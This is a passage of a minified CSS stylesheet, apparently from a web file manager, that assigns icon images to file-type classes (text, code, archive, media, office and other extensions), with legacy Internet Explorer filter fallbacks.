emfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ai.png?ver=3.30',sizingMethod='scale');}.x-air{background-image:url("../../../images/file_icon/icon_file/air.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/air.png?ver=3.30',sizingMethod='scale');}.x-arj{background-image:url("../../../images/file_icon/icon_file/arj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/arj.png?ver=3.30',sizingMethod='scale');}.x-apk{background-image:url("../../../images/file_icon/icon_file/apk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none 